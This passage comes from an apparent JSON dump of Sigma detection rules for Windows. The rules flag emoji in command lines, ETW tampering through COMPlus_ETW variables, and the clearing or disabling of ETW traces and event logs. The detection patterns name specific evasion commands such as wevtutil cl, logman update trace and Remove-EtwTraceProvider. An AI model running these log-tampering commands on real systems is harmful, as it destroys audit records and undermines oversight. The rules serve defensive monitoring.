'⏭'\n            - '⏮'\n            - '⏩'\n            - '⏪'\n            - '⏫'\n            - '⏬'\n            - '◀️'\n            - '🔼'\n            - '🔽'\n            - '➡️'\n            - '⬅️'\n            - '⬆️'\n            - '⬇️'\n            - '↗️'\n            - '↘️'\n            - '↙️'\n            - '↖️'\n            - '↕️'\n            - '↔️'\n            - '↪️'\n            - '↩️'\n            - '⤴️'\n            - '⤵️'\n            - '🔀'\n            - '🔁'\n            - '🔂'\n            - '🔄'\n            - '🔃'\n            - '🎵'\n            - '🎶'\n            - '➕'\n            - '➖'\n            - '➗'\n            - '✖️'\n            - '🟰'\n            - '♾'\n            - '💲'\n            - '💱'\n            - '™️'\n            - '©️'\n            - '®️'\n            - '〰️'\n            - '➰'\n            - '➿'\n            - '🔚'\n            - '🔙'\n            - '🔛'\n            - '🔝'\n            - '🔜'\n            - '✔️'\n            - '☑️'\n            - '🔘'\n            - '🔴'\n            - '🟠'\n            - '🟡'\n            - '🟢'\n            - '🔵'\n            - '🟣'\n            - '⚫️'\n            - '⚪️'\n            - '🟤'\n            - '🔺'\n            - '🔻'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4\nid: 225274c4-8dd1-40db-9e09-71dff4f6fb3c\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '🔸'\n            - '🔹'\n            - '🔶'\n            - '🔷'\n            - '🔳'\n            - '🔲'\n            - '▪️'\n            - '▫️'\n            - '◾️'\n            - '◽️'\n            - '◼️'\n            - '◻️'\n            - '🟥'\n            - '🟧'\n            - '🟨'\n            - '🟩'\n            - '🟦'\n            - '🟪'\n            - '⬛️'\n            - '⬜️'\n            - '🟫'\n            - '🔈'\n            - '🔇'\n            - '🔉'\n            - '🔊'\n            - '🔔'\n            - '🔕'\n            - '📣'\n            - '📢'\n            - '👁‍🗨'\n            - '💬'\n            - '💭'\n            - '🗯'\n            - '♠️'\n            - '♣️'\n            - '♥️'\n            - '♦️'\n            - '🃏'\n            - '🎴'\n            - '🀄️'\n            - '🕐'\n            - '🕑'\n            - '🕒'\n            - '🕓'\n            - '🕔'\n            - '🕕'\n            - '🕖'\n            - '🕗'\n            - '🕘'\n            - '🕙'\n            - '🕚'\n            - '🕛'\n            - '🕜'\n            - '🕝'\n            - '🕞'\n            - '🕟'\n            - '🕠'\n            - '🕡'\n            - '🕢'\n            - '🕣'\n            - '🕤'\n            - '🕥'\n            - '🕦'\n            - '🕧✢'\n            - '✣'\n            - '✤'\n            - '✥'\n            - '✦'\n            - '✧'\n            - '★'\n            - '☆'\n            - '✯'\n            - '✡︎'\n            - '✩'\n            - '✪'\n            - '✫'\n            - '✬'\n            - '✭'\n            - '✮'\n            - '✶'\n            - '✷'\n            - '✵'\n            - '✸'\n            - '✹'\n            - '→'\n            - '⇒'\n            - '⟹'\n            - '⇨'\n            - '⇾'\n            - '➾'\n            - '⇢'\n            - '☛'\n            - '☞'\n            - '➔'\n            - '➜'\n            - '➙'\n            - '➛'\n            - '➝'\n            - '➞'\n            - '♠︎'\n            - '♣︎'\n            - '♥︎'\n            - '♦︎'\n            - '♤'\n            - '♧'\n            - '♡'\n            - '♢'\n            - '♚'\n            - '♛'\n            - '♜'\n            - '♝'\n            - '♞'\n            - '♟'\n            - '♔'\n            - '♕'\n            - '♖'\n            - '♗'\n            - '♘'\n            - '♙'\n            - '⚀'\n            - '⚁'\n            - '⚂'\n            - '⚃'\n            - '⚄'\n            - '⚅'\n            - '🂠'\n            - '⚈'\n            - '⚉'\n            - '⚆'\n            - '⚇'\n            - '𓀀'\n            - '𓀁'\n            - '𓀂'\n            - '𓀃'\n            - '𓀄'\n            - '𓀅'\n            - '𓀆'\n            - '𓀇'\n            - '𓀈'\n            - '𓀉'\n            - '𓀊'\n            - '𓀋'\n            - '𓀌'\n            - '𓀍'\n            - '𓀎'\n            - '𓀏'\n            - '𓀐'\n            - '𓀑'\n            - '𓀒'\n            - '𓀓'\n            - '𓀔'\n            - '𓀕'\n            - '𓀖'\n            - '𓀗'\n            - '𓀘'\n            - '𓀙'\n            - '𓀚'\n            - '𓀛'\n            - '𓀜'\n            - '𓀝🏳️'\n            - '🏴'\n            - '🏁'\n            - '🚩'\n            - '🏳️‍🌈'\n            - '🏳️‍⚧️'\n            - '🏴‍☠️'\n            - '🇦🇫'\n            - '🇦🇽'\n            - '🇦🇱'\n            - '🇩🇿'\n            - '🇦🇸'\n            - '🇦🇩'\n            - '🇦🇴'\n            - '🇦🇮'\n            - '🇦🇶'\n            - '🇦🇬'\n            - '🇦🇷'\n            - '🇦🇲'\n            - '🇦🇼'\n            - '🇦🇺'\n            - '🇦🇹'\n            - '🇦🇿'\n            - '🇧🇸'\n            - '🇧🇭'\n            - '🇧🇩'\n            - '🇧🇧'\n            - '🇧🇾'\n            - '🇧🇪'\n            - '🇧🇿'\n            - '🇧🇯'\n            - '🇧🇲'\n            - '🇧🇹'\n            - '🇧🇴'\n            - '🇧🇦'\n            - '🇧🇼'\n            - '🇧🇷'\n            - '🇮🇴'\n            - '🇻🇬'\n            - '🇧🇳'\n            - '🇧🇬'\n            - '🇧🇫'\n            - '🇧🇮'\n            - '🇰🇭'\n            - '🇨🇲'\n            - '🇨🇦'\n            - '🇮🇨'\n            - '🇨🇻'\n            - '🇧🇶'\n            - '🇰🇾'\n            - '🇨🇫'\n            - '🇹🇩'\n            - '🇨🇱'\n            - '🇨🇳'\n            - '🇨🇽'\n            - '🇨🇨'\n            - '🇨🇴'\n            - '🇰🇲'\n            - '🇨🇬'\n            - '🇨🇩'\n            - '🇨🇰'\n            - '🇨🇷'\n            - '🇨🇮'\n            - '🇭🇷'\n            - '🇨🇺'\n            - '🇨🇼'\n            - '🇨🇾'\n            - '🇨🇿'\n            - '🇩🇰'\n            - '🇩🇯'\n            - '🇩🇲'\n            - '🇩🇴'\n            - '🇪🇨'\n            - '🇪🇬'\n            - '🇸🇻'\n            - '🇬🇶'\n            - '🇪🇷'\n            - '🇪🇪'\n            - '🇪🇹'\n            - '🇪🇺'\n            - '🇫🇰'\n            - '🇫🇴'\n            - '🇫🇯'\n            - '🇫🇮'\n            - '🇫🇷'\n            - '🇬🇫'\n            - '🇵🇫'\n            - '🇹🇫'\n            - '🇬🇦'\n            - '🇬🇲'\n            - '🇬🇪'\n            - '🇩🇪'\n            - '🇬🇭'\n            - '🇬🇮'\n            - '🇬🇷'\n            - '🇬🇱'\n            - '🇬🇩'\n            - '🇬🇵'\n            - '🇬🇺'\n            - '🇬🇹'\n            - '🇬🇬'\n            - '🇬🇳'\n            - '🇬🇼'\n            - '🇬🇾'\n            - '🇭🇹'\n            - '🇭🇳'\n            - '🇭🇰'\n            - '🇭🇺'\n            - '🇮🇸'\n            - '🇮🇳'\n            - '🇮🇩'\n            - '🇮🇷'\n            - '🇮🇶'\n            - '🇮🇪'\n            - '🇮🇲'\n            - '🇮🇱'\n            - '🇮🇹'\n            - '🇯🇲'\n            - '🇯🇵'\n            - '🎌'\n            - '🇯🇪'\n            - '🇯🇴'\n            - '🇰🇿'\n            - '🇰🇪'\n            - '🇰🇮'\n            - '🇽🇰'\n            - '🇰🇼'\n            - '🇰🇬'\n            - '🇱🇦'\n            - '🇱🇻'\n            - '🇱🇧'\n            - '🇱🇸'\n            - '🇱🇷'\n            - '🇱🇾'\n            - '🇱🇮'\n            - '🇱🇹'\n            - '🇱🇺'\n            - '🇲🇴'\n            - '🇲🇰'\n            - '🇲🇬'\n            - '🇲🇼'\n            - '🇲🇾'\n            - '🇲🇻'\n            - '🇲🇱'\n            - '🇲🇹'\n            - '🇲🇭'\n            - '🇲🇶'\n            - '🇲🇷'\n            - '🇲🇺'\n            - '🇾🇹'\n            - '🇲🇽'\n            - '🇫🇲'\n            - '🇲🇩'\n            - '🇲🇨'\n            - '🇲🇳'\n            - '🇲🇪'\n            - '🇲🇸'\n            - '🇲🇦'\n            - '🇲🇿'\n            - '🇲🇲'\n            - '🇳🇦'\n            - '🇳🇷'\n            - '🇳🇵'\n            - '🇳🇱'\n            - '🇳🇨'\n            - '🇳🇿'\n            - '🇳🇮'\n            - '🇳🇪'\n            - '🇳🇬'\n            - '🇳🇺'\n            - '🇳🇫'\n            - '🇰🇵'\n            - '🇲🇵'\n            - '🇳🇴'\n            - '🇴🇲'\n            - '🇵🇰'\n            - '🇵🇼'\n            - '🇵🇸'\n            - '🇵🇦'\n            - '🇵🇬'\n            - '🇵🇾'\n            - '🇵🇪'\n            - '🇵🇭'\n            - '🇵🇳'\n            - '🇵🇱'\n            - '🇵🇹'\n            - '🇵🇷'\n            - '🇶🇦'\n            - '🇷🇪'\n            - '🇷🇴'\n            - '🇷🇺'\n            - '🇷🇼'\n            - '🇼🇸'\n            - '🇸🇲'\n            - '🇸🇦'\n            - '🇸🇳'\n            - '🇷🇸'\n            - '🇸🇨'\n            - '🇸🇱'\n            - '🇸🇬'\n            - '🇸🇽'\n            - '🇸🇰'\n            - '🇸🇮'\n            - '🇬🇸'\n            - '🇸🇧'\n            - '🇸🇴'\n            - '🇿🇦'\n            - '🇰🇷'\n            - '🇸🇸'\n            - '🇪🇸'\n            - '🇱🇰'\n            - '🇧🇱'\n            - '🇸🇭'\n            - '🇰🇳'\n            - '🇱🇨'\n            - '🇵🇲'\n            - '🇻🇨'\n            - '🇸🇩'\n            - '🇸🇷'\n            - '🇸🇿'\n            - '🇸🇪'\n            - '🇨🇭'\n            - '🇸🇾'\n            - '🇹🇼'\n            - '🇹🇯'\n            - '🇹🇿'\n            - '🇹🇭'\n            - '🇹🇱'\n            - '🇹🇬'\n            - '🇹🇰'\n            - '🇹🇴'\n            - '🇹🇹'\n            - '🇹🇳'\n            - '🇹🇷'\n            - '🇹🇲'\n            - '🇹🇨'\n            - '🇹🇻'\n            - '🇻🇮'\n            - '🇺🇬'\n            - '🇺🇦'\n            - '🇦🇪'\n            - '🇬🇧'\n            - '🏴󠁧󠁢󠁥󠁮󠁧󠁿'\n            - '🏴󠁧󠁢󠁳󠁣󠁴󠁿'\n            - '🏴󠁧󠁢󠁷󠁬󠁳󠁿'\n            - '🇺🇳'\n            - '🇺🇸'\n            - '🇺🇾'\n            - '🇺🇿'\n            - '🇻🇺'\n            - '🇻🇦'\n            - '🇻🇪'\n            - '🇻🇳'\n            - '🇼🇫'\n            - '🇪🇭'\n            - '🇾🇪'\n            - '🇿🇲'\n            - '🇿🇼🫠'\n            - '🫢'\n            - '🫣'\n            - '🫡'\n            - '🫥'\n            - '🫤'\n            - '🥹'\n            - '🫱'\n            - '🫱🏻'\n            - '🫱🏼'\n            - '🫱🏽'\n            - '🫱🏾'\n            - '🫱🏿'\n            - '🫲'\n            - '🫲🏻'\n            - '🫲🏼'\n            - '🫲🏽'\n            - '🫲🏾'\n            - '🫲🏿'\n            - '🫳'\n            - '🫳🏻'\n            - '🫳🏼'\n            - '🫳🏽'\n            - '🫳🏾'\n            - '🫳🏿'\n            - '🫴'\n            - '🫴🏻'\n            - '🫴🏼'\n            - '🫴🏽'\n            - '🫴🏾'\n            - '🫴🏿'\n            - '🫰'\n            - '🫰🏻'\n            - '🫰🏼'\n            - '🫰🏽'\n            - '🫰🏾'\n            - '🫰🏿'\n            - '🫵'\n            - '🫵🏻'\n            - '🫵🏼'\n            - '🫵🏽'\n            - '🫵🏾'\n            - '🫵🏿'\n            - '🫶'\n            - '🫶🏻'\n            - '🫶🏼'\n            - '🫶🏽'\n            - '🫶🏾'\n            - '🫶🏿'\n            - '🤝🏻'\n            - '🤝🏼'\n            - '🤝🏽'\n            - '🤝🏾'\n            - '🤝🏿'\n            - '🫱🏻‍🫲🏼'\n            - '🫱🏻‍🫲🏽'\n            - '🫱🏻‍🫲🏾'\n            - '🫱🏻‍🫲🏿'\n            - '🫱🏼‍🫲🏻'\n            - '🫱🏼‍🫲🏽'\n            - '🫱🏼‍🫲🏾'\n            - '🫱🏼‍🫲🏿'\n            - '🫱🏽‍🫲🏻'\n            - '🫱🏽‍🫲🏼'\n            - '🫱🏽‍🫲🏾'\n            - '🫱🏽‍🫲🏿'\n            - '🫱🏾‍🫲🏻'\n            - '🫱🏾‍🫲🏼'\n            - '🫱🏾‍🫲🏽'\n            - '🫱🏾‍🫲🏿'\n            - '🫱🏿‍🫲🏻'\n            - '🫱🏿‍🫲🏼'\n            - '🫱🏿‍🫲🏽'\n            - '🫱🏿‍🫲🏾'\n            - '🫦'\n            - '🫅'\n            - '🫅🏻'\n            - '🫅🏼'\n            - '🫅🏽'\n            - '🫅🏾'\n            - '🫅🏿'\n            - '🫃'\n            - '🫃🏻'\n            - '🫃🏼'\n            - '🫃🏽'\n            - '🫃🏾'\n            - '🫃🏿'\n            - '🫄'\n            - '🫄🏻'\n            - '🫄🏼'\n            - '🫄🏽'\n            - '🫄🏾'\n            - '🫄🏿'\n            - '🧌'\n            - '🪸'\n            - '🪷'\n            - '🪹'\n            - '🪺'\n            - '🫘'\n            - '🫗'\n            - '🫙'\n            - '🛝'\n            - '🛞'\n            - '🛟'\n            - '🪬'\n            - '🪩'\n            - '🪫'\n            - '🩼'\n            - '🩻'\n            - '🫧'\n            - '🪪'\n            - '🟰'\n            - '😮‍💨'\n            - '😵‍💫'\n            - '😶‍🌫️'\n            - '❤️‍🔥'\n            - '❤️‍🩹'\n            - '🧔‍♀️'\n            - '🧔🏻‍♀️'\n            - '🧔🏼‍♀️'\n            - '🧔🏽‍♀️'\n            - '🧔🏾‍♀️'\n            - '🧔🏿‍♀️'\n            - '🧔‍♂️'\n            - '🧔🏻‍♂️'\n            - '🧔🏼‍♂️'\n            - '🧔🏽‍♂️'\n            - '🧔🏾‍♂️'\n            - '🧔🏿‍♂️'\n            - '💑🏻'\n            - '💑🏼'\n            - '💑🏽'\n            - '💑🏾'\n            - '💑🏿'\n            - '💏🏻'\n            - '💏🏼'\n            - '💏🏽'\n            - '💏🏾'\n            - '💏🏿'\n            - '👨🏻‍❤️‍👨🏻'\n            - '👨🏻‍❤️‍👨🏼'\n            - '👨🏻‍❤️‍👨🏽'\n            - '👨🏻‍❤️‍👨🏾'\n            - '👨🏻‍❤️‍👨🏿'\n            - '👨🏼‍❤️‍👨🏻'\n            - '👨🏼‍❤️‍👨🏼'\n            - '👨🏼‍❤️‍👨🏽'\n            - '👨🏼‍❤️‍👨🏾'\n            - '👨🏼‍❤️‍👨🏿'\n            - '👨🏽‍❤️‍👨🏻'\n            - '👨🏽‍❤️‍👨🏼'\n            - '👨🏽‍❤️‍👨🏽'\n            - '👨🏽‍❤️‍👨🏾'\n            - '👨🏽‍❤️‍👨🏿'\n            - '👨🏾‍❤️‍👨🏻'\n            - '👨🏾‍❤️‍👨🏼'\n            - '👨🏾‍❤️‍👨🏽'\n            - '👨🏾‍❤️‍👨🏾'\n            - '👨🏾‍❤️‍👨🏿'\n            - '👨🏿‍❤️‍👨🏻'\n            - '👨🏿‍❤️‍👨🏼'\n            - '👨🏿‍❤️‍👨🏽'\n            - '👨🏿‍❤️‍👨🏾'\n            - '👨🏿‍❤️‍👨🏿'\n            - '👩🏻‍❤️‍👨🏻'\n            - '👩🏻‍❤️‍👨🏼'\n            - '👩🏻‍❤️‍👨🏽'\n            - '👩🏻‍❤️‍👨🏾'\n            - '👩🏻‍❤️‍👨🏿'\n            - '👩🏻‍❤️‍👩🏻'\n            - '👩🏻‍❤️‍👩🏼'\n            - '👩🏻‍❤️‍👩🏽'\n            - '👩🏻‍❤️‍👩🏾'\n            - '👩🏻‍❤️‍👩🏿'\n            - '👩🏼‍❤️‍👨🏻'\n            - '👩🏼‍❤️‍👨🏼'\n            - '👩🏼‍❤️‍👨🏽'\n            - '👩🏼‍❤️‍👨🏾'\n            - '👩🏼‍❤️‍👨🏿'\n            - '👩🏼‍❤️‍👩🏻'\n            - '👩🏼‍❤️‍👩🏼'\n            - '👩🏼‍❤️‍👩🏽'\n            - '👩🏼‍❤️‍👩🏾'\n            - '👩🏼‍❤️‍👩🏿'\n            - '👩🏽‍❤️‍👨🏻'\n            - '👩🏽‍❤️‍👨🏼'\n            - '👩🏽‍❤️‍👨🏽'\n            - '👩🏽‍❤️‍👨🏾'\n            - '👩🏽‍❤️‍👨🏿'\n            - '👩🏽‍❤️‍👩🏻'\n            - '👩🏽‍❤️‍👩🏼'\n            - '👩🏽‍❤️‍👩🏽'\n            - '👩🏽‍❤️‍👩🏾'\n            - '👩🏽‍❤️‍👩🏿'\n            - '👩🏾‍❤️‍👨🏻'\n            - '👩🏾‍❤️‍👨🏼'\n            - '👩🏾‍❤️‍👨🏽'\n            - '👩🏾‍❤️‍👨🏾'\n            - '👩🏾‍❤️‍👨🏿'\n            - '👩🏾‍❤️‍👩🏻'\n            - '👩🏾‍❤️‍👩🏼'\n            - '👩🏾‍❤️‍👩🏽'\n            - '👩🏾‍❤️‍👩🏾'\n            - '👩🏾‍❤️‍👩🏿'\n            - '👩🏿‍❤️‍👨🏻'\n            - '👩🏿‍❤️‍👨🏼'\n            - '👩🏿‍❤️‍👨🏽'\n            - '👩🏿‍❤️‍👨🏾'\n            - '👩🏿‍❤️‍👨🏿'\n            - '👩🏿‍❤️‍👩🏻'\n            - '👩🏿‍❤️‍👩🏼'\n            - '👩🏿‍❤️‍👩🏽'\n            - '👩🏿‍❤️‍👩🏾'\n            - '👩🏿‍❤️‍👩🏿'\n            - '🧑🏻‍❤️‍🧑🏼'\n            - '🧑🏻‍❤️‍🧑🏽'\n            - '🧑🏻‍❤️‍🧑🏾'\n            - '🧑🏻‍❤️‍🧑🏿'\n            - '🧑🏼‍❤️‍🧑🏻'\n            - '🧑🏼‍❤️‍🧑🏽'\n            - '🧑🏼‍❤️‍🧑🏾'\n            - '🧑🏼‍❤️‍🧑🏿'\n            - '🧑🏽‍❤️‍🧑🏻'\n            - '🧑🏽‍❤️‍🧑🏼'\n            - '🧑🏽‍❤️‍🧑🏾'\n            - '🧑🏽‍❤️‍🧑🏿'\n            - '🧑🏾‍❤️‍🧑🏻'\n            - '🧑🏾‍❤️‍🧑🏼'\n            - '🧑🏾‍❤️‍🧑🏽'\n            - '🧑🏾‍❤️‍🧑🏿'\n            - '🧑🏿‍❤️‍🧑🏻'\n            - '🧑🏿‍❤️‍🧑🏼'\n            - '🧑🏿‍❤️‍🧑🏽'\n            - '🧑🏿‍❤️‍🧑🏾'\n            - '👨🏻‍❤️‍💋‍👨🏻'\n            - '👨🏻‍❤️‍💋‍👨🏼'\n            - '👨🏻‍❤️‍💋‍👨🏽'\n            - '👨🏻‍❤️‍💋‍👨🏾'\n            - '👨🏻‍❤️‍💋‍👨🏿'\n            - '👨🏼‍❤️‍💋‍👨🏻'\n            - '👨🏼‍❤️‍💋‍👨🏼'\n            - '👨🏼‍❤️‍💋‍👨🏽'\n            - '👨🏼‍❤️‍💋‍👨🏾'\n            - '👨🏼‍❤️‍💋‍👨🏿'\n            - '👨🏽‍❤️‍💋‍👨🏻'\n            - '👨🏽‍❤️‍💋‍👨🏼'\n            - '👨🏽‍❤️‍💋‍👨🏽'\n            - '👨🏽‍❤️‍💋‍👨🏾'\n            - '👨🏽‍❤️‍💋‍👨🏿'\n            - '👨🏾‍❤️‍💋‍👨🏻'\n            - '👨🏾‍❤️‍💋‍👨🏼'\n            - '👨🏾‍❤️‍💋‍👨🏽'\n            - '👨🏾‍❤️‍💋‍👨🏾'\n            - '👨🏾‍❤️‍💋‍👨🏿'\n            - '👨🏿‍❤️‍💋‍👨🏻'\n            - '👨🏿‍❤️‍💋‍👨🏼'\n            - '👨🏿‍❤️‍💋‍👨🏽'\n            - '👨🏿‍❤️‍💋‍👨🏾'\n            - '👨🏿‍❤️‍💋‍👨🏿'\n            - '👩🏻‍❤️‍💋‍👨🏻'\n            - '👩🏻‍❤️‍💋‍👨🏼'\n            - '👩🏻‍❤️‍💋‍👨🏽'\n            - '👩🏻‍❤️‍💋‍👨🏾'\n            - '👩🏻‍❤️‍💋‍👨🏿'\n            - '👩🏻‍❤️‍💋‍👩🏻'\n            - '👩🏻‍❤️‍💋‍👩🏼'\n            - '👩🏻‍❤️‍💋‍👩🏽'\n            - '👩🏻‍❤️‍💋‍👩🏾'\n            - '👩🏻‍❤️‍💋‍👩🏿'\n            - '👩🏼‍❤️‍💋‍👨🏻'\n            - '👩🏼‍❤️‍💋‍👨🏼'\n            - '👩🏼‍❤️‍💋‍👨🏽'\n            - '👩🏼‍❤️‍💋‍👨🏾'\n            - '👩🏼‍❤️‍💋‍👨🏿'\n            - '👩🏼‍❤️‍💋‍👩🏻'\n            - '👩🏼‍❤️‍💋‍👩🏼'\n            - '👩🏼‍❤️‍💋‍👩🏽'\n            - '👩🏼‍❤️‍💋‍👩🏾'\n            - '👩🏼‍❤️‍💋‍👩🏿'\n            - '👩🏽‍❤️‍💋‍👨🏻'\n            - '👩🏽‍❤️‍💋‍👨🏼'\n            - '👩🏽‍❤️‍💋‍👨🏽'\n            - '👩🏽‍❤️‍💋‍👨🏾'\n            - '👩🏽‍❤️‍💋‍👨🏿'\n            - '👩🏽‍❤️‍💋‍👩🏻'\n            - '👩🏽‍❤️‍💋‍👩🏼'\n            - '👩🏽‍❤️‍💋‍👩🏽'\n            - '👩🏽‍❤️‍💋‍👩🏾'\n            - '👩🏽‍❤️‍💋‍👩🏿'\n            - '👩🏾‍❤️‍💋‍👨🏻'\n            - '👩🏾‍❤️‍💋‍👨🏼'\n            - '👩🏾‍❤️‍💋‍👨🏽'\n            - '👩🏾‍❤️‍💋‍👨🏾'\n            - '👩🏾‍❤️‍💋‍👨🏿'\n            - '👩🏾‍❤️‍💋‍👩🏻'\n            - '👩🏾‍❤️‍💋‍👩🏼'\n            - '👩🏾‍❤️‍💋‍👩🏽'\n            - '👩🏾‍❤️‍💋‍👩🏾'\n            - '👩🏾‍❤️‍💋‍👩🏿'\n            - '👩🏿‍❤️‍💋‍👨🏻'\n            - '👩🏿‍❤️‍💋‍👨🏼'\n            - '👩🏿‍❤️‍💋‍👨🏽'\n            - '👩🏿‍❤️‍💋‍👨🏾'\n            - '👩🏿‍❤️‍💋‍👨🏿'\n            - '👩🏿‍❤️‍💋‍👩🏻'\n            - '👩🏿‍❤️‍💋‍👩🏼'\n            - '👩🏿‍❤️‍💋‍👩🏽'\n            - '👩🏿‍❤️‍💋‍👩🏾'\n            - '👩🏿‍❤️‍💋‍👩🏿'\n            - '🧑🏻‍❤️‍💋‍🧑🏼'\n            - '🧑🏻‍❤️‍💋‍🧑🏽'\n            - '🧑🏻‍❤️‍💋‍🧑🏾'\n            - '🧑🏻‍❤️‍💋‍🧑🏿'\n            - '🧑🏼‍❤️‍💋‍🧑🏻'\n            - '🧑🏼‍❤️‍💋‍🧑🏽'\n            - '🧑🏼‍❤️‍💋‍🧑🏾'\n            - '🧑🏼‍❤️‍💋‍🧑🏿'\n            - '🧑🏽‍❤️‍💋‍🧑🏻'\n            - '🧑🏽‍❤️‍💋‍🧑🏼'\n            - '🧑🏽‍❤️‍💋‍🧑🏾'\n            - '🧑🏽‍❤️‍💋‍🧑🏿'\n            - '🧑🏾‍❤️‍💋‍🧑🏻'\n            - '🧑🏾‍❤️‍💋‍🧑🏼'\n            - '🧑🏾‍❤️‍💋‍🧑🏽'\n            - '🧑🏾‍❤️‍💋‍🧑🏿'\n            - '🧑🏿‍❤️‍💋‍🧑🏻'\n            - '🧑🏿‍❤️‍💋‍🧑🏼'\n            - '🧑🏿‍❤️‍💋‍🧑🏽'\n            - '🧑🏿‍❤️‍💋‍🧑🏾'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml",
    "content": "title: ETW Logging Tamper In .NET Processes Via CommandLine\nid: 41421f44-58f9-455d-838a-c398859841d4\nstatus: test\ndescription: |\n    Detects changes to environment variables related to ETW logging via the CommandLine.\n    This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.\nreferences:\n    - https://twitter.com/_xpn_/status/1268712093928378368\n    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\n    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\n    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\n    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\n    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\n    - https://bunnyinside.com/?term=f71e8cb9c76a\n    - http://managed670.rssing.com/chan-5590147/all_p1.html\n    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2022-12-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'COMPlus_ETWEnabled'\n            - 'COMPlus_ETWFlags'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml",
    "content": "title: ETW Trace Evasion Activity\nid: a238b5d0-ce2d-4414-a676-7a531b3d13d6\nstatus: test\ndescription: |\n    Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\n    - https://abuse.io/lockergoga.txt\n    - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63\nauthor: '@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community'\ndate: 2019-03-22\nmodified: 2022-06-28\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562.006\n    - car.2016-04-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_clear_1:\n        CommandLine|contains|all:\n            - 'cl'\n            - '/Trace'\n    selection_clear_2:\n        CommandLine|contains|all:\n            - 'clear-log'\n            - '/Trace'\n    selection_disable_1:\n        CommandLine|contains|all:\n            - 'sl'\n            - '/e:false'\n    selection_disable_2:\n        CommandLine|contains|all:\n            - 'set-log'\n            - '/e:false'\n    selection_disable_3:   # ETW provider removal from a trace session\n        CommandLine|contains|all:\n            - 'logman'\n            - 'update'\n            - 'trace'\n            - '--p'\n            - '-ets'\n    selection_pwsh_remove:   # Autologger provider removal\n        CommandLine|contains: 'Remove-EtwTraceProvider'\n    selection_pwsh_set:   # Provider “Enable” property modification\n        CommandLine|contains|all:\n            - 'Set-EtwTraceProvider'\n            - '0x11'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml",
    "content": "title: Suspicious Eventlog Clearing or Configuration Change Activity\nid: cc36992a-4671-4f21-a91d-6c2b72a2edf5\nstatus: stable\ndescription: |\n    Detects the clearing or configuration tampering of EventLog using utilities such as \"wevtutil\", \"powershell\" and \"wmic\".\n    This technique were seen used by threat actors and ransomware strains in order to evade defenses.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\n    - https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee\n    - https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/\n    - https://www.linkedin.com/posts/huntress-labs_when-a-sketchy-incident-hits-your-network-activity-7304940371078238208-Th_l/?utm_source=share&utm_medium=member_desktop&rcm=ACoAAAJTlRcB28IaUtg03HUU-IdliwzoAL1flGc\n    - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear\nauthor: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-09-26\nmodified: 2025-03-12\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - attack.t1562.002\n    - car.2016-04-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wevtutil_img:\n        - Image|endswith: '\\wevtutil.exe'\n        - OriginalFileName: 'wevtutil.exe'\n    